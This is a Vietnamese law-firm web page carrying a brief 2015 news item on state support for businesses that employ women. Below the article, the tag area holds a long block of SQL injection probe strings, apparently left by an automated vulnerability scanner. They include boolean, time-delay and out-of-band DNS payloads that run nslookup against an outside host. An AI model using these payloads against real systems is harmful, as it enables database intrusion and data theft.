Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Doanh nghiệp sử dụng lao động nữ sẽ được hưởng nhiều hỗ trợ

Cập nhật lần cuối lúc 00:00 ngày 23/02/2015

Doanh nghiệp có dự án vay vốn khả thi và tạo thêm việc làm mới cho lao động nữ thì được vay vốn với lãi suất thấp từ quỹ quốc gia về việc làm.


Hình minh họa.

Theo quy định tại điểm a và điểm b Khoản 2 Điều 4 dự thảo Nghị định số 03/2014/NĐ-CP ngày 16/1/2014 của Chính phủ quy định chi tiết thi hành một số điều của Bộ luật lao động về việc làm, doanh nghiệp sử dụng lao động nữ sẽ được hưởng nhiều hỗ trợ.

Theo đó, trường hợp doanh nghiệp gặp khó khăn do suy giảm kinh tế, để hạn chế người lao động bị mất việc làm thì doanh nghiệp được lập dự án đề nghị hỗ trợ từ quỹ quốc gia về việc làm. Những doanh nghiệp này cũng sẽ được xét giảm thuế theo quy định của pháp luật về thuế.

Bên cạnh đó, doanh nghiệp sử dụng nhiều lao động nữ còn được ưu tiên sử dụng một phần trong tổng số vốn đầu tư hàng năm của doanh nghiệp để chi cho việc cải thiện điều kiện làm việc cho lao động nữ.

Doanh nghiệp còn được cho thuê đất, được vay vốn từ ngân hàng chính sách xã hội để đầu tư xây dựng nhà trẻ, mẫu giáo cho người lao động.

Linh Linh

Tag : ,
1
1
1'"
-1 OR 2+926-926-1=0+0+0+1 --
\
-1 OR 3+926-926-1=0+0+0+1 --
1
@@M3mbF
-1 OR 3*2<(0+5+926-926) --
JyI=
-1 OR 3*2>(0+5+926-926) --
-1 OR 2+290-290-1=0+0+0+1
-1 OR 3+290-290-1=0+0+0+1
-1 OR 3*2<(0+5+290-290)
-1 OR 3*2>(0+5+290-290)
-1' OR 2+977-977-1=0+0+0+1 --
-1' OR 3+977-977-1=0+0+0+1 --
-1' OR 3*2<(0+5+977-977) --
-1' OR 3*2>(0+5+977-977) --
-1' OR 2+400-400-1=0+0+0+1 or 'rTQKb431'='
-1' OR 3+400-400-1=0+0+0+1 or 'rTQKb431'='
-1' OR 3*2<(0+5+400-400) or 'rTQKb431'='
-1' OR 3*2>(0+5+400-400) or 'rTQKb431'='
-1" OR 2+998-998-1=0+0+0+1 --
-1" OR 3+998-998-1=0+0+0+1 --
-1" OR 3*2<(0+5+998-998) --
-1" OR 3*2>(0+5+998-998) --
if(now()=sysdate(),sleep(8.876000000000001),0)/*'XOR(if(now()=sysdate(),sleep(8.876000000000001),0))OR'"XOR(if(now()=sysdate(),sleep(8.876000000000001),0))OR"*/
(select(0)from(select(sleep(8.876000000000001)))v)/*'+(select(0)from(select(sleep(8.876000000000001)))v)+'"+(select(0)from(select(sleep(8.876000000000001)))v)+"*/
-1; waitfor delay '0:0:13.314000000000001' --
-1); waitfor delay '0:0:13.314000000000001' --
1 waitfor delay '0:0:8.876000000000001' --
NyODTnxO'; waitfor delay '0:0:8.876000000000001' --
-1;select pg_sleep(8.876000000000001); --
-1);select pg_sleep(8.876000000000001); --
-1));select pg_sleep(8.876000000000001); --
YP8prsyN';select pg_sleep(13.314000000000001); --
olzbVHQu');select pg_sleep(13.314000000000001); --
E0QnLZGK'));select pg_sleep(13.314000000000001); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-3750.34060.31789.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-3752.34060.31789.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-3753.34060.31789.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-3754.34060.31789.\1.bxss.me
299'
1

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: